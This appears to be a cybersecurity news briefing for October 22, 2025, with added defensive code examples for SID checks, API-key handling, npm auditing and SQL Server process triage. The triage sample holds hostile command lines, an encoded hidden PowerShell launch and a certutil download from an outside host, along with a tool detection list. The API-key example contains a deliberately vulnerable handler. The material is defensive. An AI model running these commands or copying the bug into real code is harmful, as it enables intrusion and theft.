BMC Daily Cyber News

This is today’s cyber news for October 22nd, 2025. A major AWS outage reminded everyone how fragile single-cloud strategies can be, while a Windows update snag locked out cloned PCs with duplicate SIDs. CISA pressed urgency on an exploited Oracle E-Business Suite flaw, and a critical TP-Link Omada bug exposed small-business gateways to takeover. Researchers flagged outdated Chromium builds inside popular AI code editors, and Pwn2Own’s opening day delivered a flood of zero-days. We also cover Vidar Stealer’s faster redesign, a Copilot prompt-injection trick, a fast-growing PolarEdge router botnet, and a Citrix-based breach of a European telecom.

You will also hear how captchas are being weaponized by Star Blizzard, why Apache Syncope needs immediate patching, and how a “better-auth” plugin bug enables silent API-key minting. We run through Apple devices added to CISA’s exploited list, Microsoft’s WinRE hotfix for recovery input, and a ransomware hit that paused Muji’s online shop. Rounding it out: malicious npm packages seeding AdaptixC2, APT36’s NIC-spoofing phish, the “Cavalry Werewolf” espionage campaign against industrial firms, and a stealthy SQL Server exfiltration wave. It is a crisp, plain-English briefing for leaders, defenders, and builders alike, available at DailyCyber.news.

What is BMC Daily Cyber News?

The BMC Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.

This is today’s cyber news for October 22nd, 2025. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.

A big Amazon Web Services outage knocked popular apps offline and slowed logins, checkouts, and streaming. It matters because single-cloud designs turn a vendor hiccup into your downtime and customer frustration. Teams that rely on one region or manual failover are most exposed. Watch for elevated error rates in synthetic monitoring and spikes in user retries at login and checkout. Run an end-to-end failover test for your top customer journey and fix any gaps you find.

A recent Microsoft update broke Windows logins on machines that share the same Security Identifier, or SID. That’s a business problem because authentication outages can paralyze support desks and delay work across entire departments. Cloned virtual desktop images and lab machines built from one image without generalizing it are the most exposed. Look for spikes in failed Kerberos logons and Group Policy errors in event logs. Identify duplicate-SID machines, remediate them, and add a SID-uniqueness check to your build process.
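One way to build that SID-uniqueness check, as an added example for this briefing rather than code from Microsoft or the page: every local account SID carries the machine SID as its S-1-5-21-A-B-C prefix, so collecting one local account SID per host (here the built-in RID-500 Administrator account) and grouping hosts by that prefix exposes clones. The inventory below is constructed; the hostnames and SID values are made up.

```python
"""Flag hosts that share a machine SID.

Added example for this briefing, not code from Microsoft or the page.
It assumes an inventory export mapping hostname to the SID of the
built-in local Administrator account (RID 500); values are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Local account SIDs have the form S-1-5-21-<A>-<B>-<C>-<RID>; the machine
# SID is the S-1-5-21-<A>-<B>-<C> prefix. Domain SIDs share this shape, so
# the inventory must carry *local* account SIDs (the RID-500 account is a
# convenient one because every Windows install has it, even when renamed).
_LOCAL_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def machine_sid(account_sid: str) -> str:
    """Strip the RID from a local account SID to get the machine SID."""
    m = _LOCAL_SID.match(account_sid)
    if not m:
        raise ValueError(f"not a local account SID: {account_sid!r}")
    return m.group(1)


def find_duplicate_machine_sids(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Return {machine_sid: [hostnames]} for every machine SID seen on 2+ hosts."""
    hosts_by_sid: dict[str, list[str]] = defaultdict(list)
    for host, sid in inventory.items():
        hosts_by_sid[machine_sid(sid)].append(host)
    return {sid: sorted(hosts) for sid, hosts in hosts_by_sid.items() if len(hosts) > 1}


# Constructed inventory: three hosts cloned from one image without Sysprep
# (same machine SID) plus two hosts that were generalized properly.
SAMPLE_INVENTORY = {
    "VDI-0001": "S-1-5-21-1004336348-1177238915-682003330-500",
    "VDI-0002": "S-1-5-21-1004336348-1177238915-682003330-500",
    "LAB-WIN11": "S-1-5-21-1004336348-1177238915-682003330-500",
    "HR-LAPTOP-07": "S-1-5-21-2012345678-345678901-456789012-500",
    "BUILD-AGENT-2": "S-1-5-21-3123456789-234567890-567890123-500",
}

if __name__ == "__main__":
    for sid, hosts in find_duplicate_machine_sids(SAMPLE_INVENTORY).items():
        print(f"duplicate machine SID {sid}: {', '.join(hosts)}")
```

On each host, the input SID can be read with PowerShell’s `Get-LocalUser`, whose objects expose a `SID` property; feed the RID-500 account’s SID into the inventory and run the check as a gate in the image pipeline so a clone never reaches the domain.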

CISA put an Oracle E-Business Suite flaw on its Known Exploited Vulnerabilities list, which means attackers are abusing it in the wild. This matters because Oracle EBS runs finance, procurement, and human resources, so impact is immediate and sensitive. Internet-reachable instances and those with thin reverse-proxy logging are most exposed. Watch for unusual outbound connections from EBS hosts and admin access at odd hours. Patch now, and if you can’t, restrict exposure, add WAF rules, and dig into recent logs.

A critical bug in TP-Link Omada gateways lets anyone run commands without logging in. That’s serious because these small-business edge devices control branch and guest networking, making them high-leverage footholds. Sites with internet-exposed management or default credentials are most exposed. Watch for unexpected reboots, configuration changes outside maintenance windows, and new outbound connections from the gateway. Patch immediately, and if you can’t today, lock management behind VPN, rotate credentials, and verify configs.

Two popular AI-assisted code editors, Cursor and Windsurf, ship embedded Chromium components with dozens of known bugs. It matters because developers browse docs and sign into services inside these tools, putting tokens and code at risk. Developer workstations and build hosts that delay updates are most exposed. Watch for unusual OAuth grants from developer machines and odd Git activity outside normal hours. Update the editors now and move sensitive browsing to a fully patched browser until you do.

Researchers at the Pwn2Own contest in Ireland demonstrated thirty-four zero-day exploits on day one. That matters because contest techniques often become blueprints for real attacks before patches fully land. Browsers, virtualization platforms, and enterprise apps are most exposed as vendors race to fix issues. Watch for spikes in browser or hypervisor crashes and new exploit signatures in your prevention tools. Prioritize patches tied to Pwn2Own disclosures and temporarily harden sandboxes or disable risky features where possible.

The Vidar information-stealing malware was rebuilt for speed and stealth with multithreaded collection. That matters because it can grab credentials, cookies, and wallet data before defenses react. Browsers on user workstations and finance or admin accounts are most exposed. Watch for sudden browser profile file access and outbound posts to first-seen domains. Block malvertising sources, harden browsers, and rotate sensitive tokens if you see signs of compromise.

A growing botnet called PolarEdge is compromising routers from Cisco, ASUS, QNAP, and Synology. It matters because those devices become launchpads for DDoS, proxies, and internal footholds. Home offices, small businesses, and branches with weak passwords or old firmware are most exposed. Watch for new open ports on the internet side and steady outbound traffic from the router itself. Update firmware, disable WAN-side admin, and replace end-of-life hardware that can’t be secured.

Apache Syncope, an identity and access management platform, has a remote code execution flaw on older versions. That’s a big deal because owning identity infrastructure lets attackers mint or escalate privileges across systems. Orgs with internet-exposed admin endpoints or weak authentication are most exposed. Watch for unexpected role escalations and outbound connections from the IAM host to unfamiliar addresses. Upgrade Syncope immediately and, if needed, disable risky script execution and lock admin paths behind a VPN while you patch.

A bug in the popular Node.js plugin “better-auth” lets attackers create API keys for any user. It matters because keys often bypass multi-factor checks and can perform privileged actions quietly. Apps that rely on these keys for admin tasks or provisioning are most exposed. Watch for API calls from new IP ranges using freshly created keys and spikes in key-creation events. Patch affected apps, rotate all keys created during exposure, and add server-side checks for sensitive actions.
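The generic failure behind an item like this is a create-key endpoint that lets the caller pick the key’s owner. The following is an added example written for this briefing; it is not better-auth’s code and does not describe that bug’s mechanics, which the page does not give. The `Session`, `KeyStore` and request-body shape are assumptions. It shows the weak handler beside a hardened one that binds the owner to the authenticated principal and requires a completed second factor before minting, since keys outlive the session and bypass interactive MFA.

```python
"""Bind API-key creation to the authenticated caller.

Added example for this briefing; not better-auth's code and not a
description of its bug. Session, KeyStore and the body shape are assumed.
"""
from __future__ import annotations

import hashlib
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    user_id: str
    mfa_verified: bool  # did this session complete a second factor?


class Forbidden(Exception):
    pass


@dataclass
class KeyStore:
    # Only a hash of each key is kept; the raw key is shown once at creation.
    owner_by_hash: dict[str, str] = field(default_factory=dict)

    @staticmethod
    def _h(raw: str) -> str:
        return hashlib.sha256(raw.encode()).hexdigest()

    def mint(self, owner: str) -> str:
        raw = "ak_" + secrets.token_urlsafe(24)
        self.owner_by_hash[self._h(raw)] = owner
        return raw

    def owner_of(self, raw: str) -> str | None:
        return self.owner_by_hash.get(self._h(raw))


def create_key_vulnerable(store: KeyStore, session: Session, body: dict) -> str:
    # ILLUSTRATIVE BUG: the owner comes from the request body, so any
    # authenticated user can mint a key that acts as someone else.
    return store.mint(body.get("user_id", session.user_id))


def create_key_hardened(store: KeyStore, session: Session, body: dict) -> str:
    # The owner is always the authenticated principal. A mismatching user_id
    # in the body is rejected rather than silently ignored, so tampering
    # shows up in the audit log as a denied request.
    if body.get("user_id", session.user_id) != session.user_id:
        raise Forbidden("cannot mint keys for another user")
    # Keys outlive the session and skip interactive MFA, so demand the
    # second factor at the moment of minting.
    if not session.mfa_verified:
        raise Forbidden("step-up authentication required to mint keys")
    return store.mint(session.user_id)


def demo() -> dict[str, object]:
    """Run both handlers with a tampered body from a low-privilege session."""
    store = KeyStore()
    attacker = Session(user_id="alice", mfa_verified=True)
    tampered = {"user_id": "admin"}

    leaked = create_key_vulnerable(store, attacker, tampered)
    try:
        create_key_hardened(store, attacker, tampered)
        blocked = False
    except Forbidden:
        blocked = True
    own_key = create_key_hardened(store, attacker, {})
    return {
        "vulnerable_key_owner": store.owner_of(leaked),  # "admin"
        "hardened_rejected_tamper": blocked,              # True
        "hardened_key_owner": store.owner_of(own_key),    # "alice"
    }


if __name__ == "__main__":
    print(demo())
```

The same principle applies on the consuming side: when a key is presented for a sensitive action, resolve its owner from the store and authorize against that identity, never against anything the request claims about who it is.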

CISA added actively exploited Apple device vulnerabilities to its Known Exploited Vulnerabilities list. That matters because unpatched iPhones, iPads, and Macs can be used for spyware, code execution, or sandbox escapes. Mixed fleets, BYOD programs, and executive devices are most exposed. Watch for devices that remain on old versions after the update window and unusual management profile changes. Enforce updates within seventy-two hours and revoke access to corporate apps for devices that stay out of date.

Microsoft shipped an out-of-band update to restore keyboard and mouse input in Windows Recovery. That’s important because if you cannot type in recovery, you cannot recover quickly during an incident. Enterprises that customize WinRE images or rely on offline repair are most exposed. Watch for failed offline repair attempts and help-desk tickets mentioning missing input in recovery screens. Apply the hotfix now and verify recovery workflows on representative hardware, including BitLocker unlock and network drivers.

Muji paused online sales after a ransomware hit on a third-party logistics partner disrupted order processing. It matters because a vendor’s downtime instantly becomes your revenue loss and customer frustration. Retailers and brands that depend on single fulfillment partners are most exposed. Watch for spikes in order failures, warehouse timeouts, and rapid EDI or API retries. Validate vendor ransomware readiness, including backups and recovery drills, and tighten SLAs around incident transparency.

Researchers found npm packages that install a command-and-control framework called AdaptixC2 on developer machines. That’s a problem because compromised build hosts can leak keys, poison releases, and spread silently. Teams with permissive package policies and broad CI/CD permissions are most exposed. Watch for unexpected outbound beacons from build agents and modifications to SSH keys or npm tokens. Quarantine affected hosts, rotate developer secrets, and pin packages to vetted, signed versions.
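Two of the controls this item calls for, pinning and a tighter package policy, can be checked mechanically. The following is an added example for this briefing, not code from the researchers or from npm. The page does not say how the AdaptixC2 packages executed; this check covers two generic points: dependency specs in the root manifest that are not exact versions, and lifecycle scripts in any installed package that npm runs automatically during install. The manifests below are constructed, and `example-color-helper` is an invented package name.

```python
"""Audit a package tree for unpinned specs and install-time scripts.

Added example for this briefing, not from the page or from npm. Input is
a mapping of manifest path to package.json text; the manifests below are
constructed and the dependency "example-color-helper" is invented.
"""
from __future__ import annotations

import json
import re

# Hooks npm runs automatically during `npm install`; code here executes on
# every developer machine and CI runner that installs the tree.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Exact semver, optionally with pre-release/build metadata. Anything else
# (^, ~, ranges, tags like "latest", URLs) can resolve to a different
# artifact tomorrow than it did today.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$")


def audit_tree(manifests: dict[str, str]) -> list[str]:
    """Return one finding per unpinned root dependency or install-time script."""
    findings: list[str] = []
    for path, text in manifests.items():
        pkg = json.loads(text)
        is_root = path == "package.json"
        if is_root:
            for section in ("dependencies", "devDependencies", "optionalDependencies"):
                for name, spec in pkg.get(section, {}).items():
                    if not EXACT_VERSION.match(spec):
                        findings.append(f"{path}: {section}.{name} = {spec!r} is not an exact version")
        for hook in INSTALL_HOOKS:
            cmd = pkg.get("scripts", {}).get(hook)
            if cmd is not None:
                where = "root manifest" if is_root else f"dependency {pkg.get('name', '?')}"
                findings.append(f"{path}: {where} runs scripts.{hook} at install time: {cmd!r}")
    return findings


# Constructed tree: a root manifest plus two installed packages.
SAMPLE_MANIFESTS = {
    "package.json": """{
      "name": "orders-service",
      "dependencies": {
        "express": "4.19.2",
        "lodash": "^4.17.21",
        "example-color-helper": "latest"
      },
      "scripts": { "build": "tsc -p ." }
    }""",
    "node_modules/express/package.json": """{
      "name": "express", "version": "4.19.2",
      "scripts": { "test": "mocha" }
    }""",
    "node_modules/example-color-helper/package.json": """{
      "name": "example-color-helper", "version": "1.4.2",
      "scripts": { "postinstall": "node scripts/setup.js" }
    }""",
}

if __name__ == "__main__":
    for finding in audit_tree(SAMPLE_MANIFESTS):
        print(finding)
```

In practice, run this against the checked-in lockfile’s resolved tree rather than a live `node_modules`, and install with `npm ci --ignore-scripts` on build agents so a lifecycle hook in a dependency cannot run until someone has reviewed why it exists.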

A threat group known as APT36 spoofed India’s National Informatics Centre emails to steal credentials. It matters because believable government-style notices drive clicks and open doors to sensitive portals. Public-sector users and contractors with access to internal systems are most exposed. Watch for sign-ins from new locations after NIC-themed emails and bursts of password resets. Enforce phishing-resistant MFA and block lookalike domains while reviewing recent access for lateral movement.

Analysts tracked “Cavalry Werewolf” using custom remote-access tools against energy, mining, and manufacturing targets. That’s serious because attackers blended spear-phishing with living-off-the-land techniques to persist near production environments. Organizations that monitor only office IT while ignoring engineering networks are most exposed. Watch for new remote admin tools on jump servers and timed data staging from OT-adjacent subnets. Segment engineering networks tightly, require just-in-time admin access, and restrict egress with detailed logging.

A long-running campaign is abusing Microsoft SQL Server to persist and quietly siphon data from governments and banks. It matters because database servers double as treasure vaults and launchpads when misconfigured. Instances with weak credentials, exposed management ports, or enabled xp_cmdshell are most exposed. Watch for new SQL Agent jobs, unusual long-running queries, and OS-level processes spawned by sqlservr.exe. Disable risky features, rotate credentials, and hunt for staging tables or outbound connections before rebuilding from clean backups.
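The “OS-level processes spawned by sqlservr.exe” hunt above is the easiest of the three to automate. The following is an added example for this briefing, not code from the research the item summarizes. It runs over constructed process-creation records that use Sysmon Event ID 1 field names (`Image`, `ParentImage`, `CommandLine`, `Computer`); the hostnames, paths and the 198.51.100.23 address are made up. Some legitimate tooling also runs as a child of the engine, so the output is a triage queue rather than a verdict.

```python
"""Triage process-creation events for SQL Server abuse.

Added example for this briefing, not from the research it summarizes.
Records are constructed and follow Sysmon Event ID 1 field names.
"""
from __future__ import annotations

# xp_cmdshell, OLE automation (sp_OACreate) and misused CLR assemblies all
# surface the same way: the engine process, sqlservr.exe, spawning a shell,
# script host or download-capable utility.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# Substrings (matched case-insensitively) that point at download or
# encoded-command activity; "-enc" also covers "-encodedcommand".
DOWNLOAD_OR_ENCODED = ("-enc", "downloadstring", "invoke-webrequest", "http://", "https://", "-urlcache")

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events: list[dict[str, str]]) -> list[dict[str, object]]:
    """Return one finding per child of sqlservr.exe that looks like abuse."""
    findings: list[dict[str, object]] = []
    for ev in events:
        if basename(ev["ParentImage"]) != "sqlservr.exe":
            continue
        child = basename(ev["Image"])
        cmdline = ev.get("CommandLine", "").lower()
        reasons: list[str] = []
        if child in SUSPICIOUS_CHILDREN:
            reasons.append(f"sqlservr.exe spawned {child}")
        if any(marker in cmdline for marker in DOWNLOAD_OR_ENCODED):
            reasons.append("command line downloads content or is encoded")
        if reasons:
            findings.append({
                "host": ev.get("Computer", "?"),
                "image": ev["Image"],
                "command_line": ev.get("CommandLine", ""),
                "reasons": reasons,
            })
    return findings


# Constructed events: two xp_cmdshell-style shells, a benign console host,
# a certutil download, and an unrelated PowerShell launch from explorer.exe.
SAMPLE_EVENTS = [
    {"Computer": "SQL01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Computer": "SQL01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir D:\Backups"},
    {"Computer": "SQL01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"Computer": "SQL01", "ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.23/u.txt C:\ProgramData\u.txt"},
    {"Computer": "WS-204", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["image"], "|", "; ".join(hit["reasons"]))
```

Pair the process hunt with two quick queries on the instance itself: `SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'` tells you whether the feature is on, and `msdb.dbo.sysjobs` carries `date_created` and `date_modified` columns that make recently added or altered SQL Agent jobs easy to list.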

That’s the BareMetalCyber Daily Brief for October 22nd, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back tomorrow.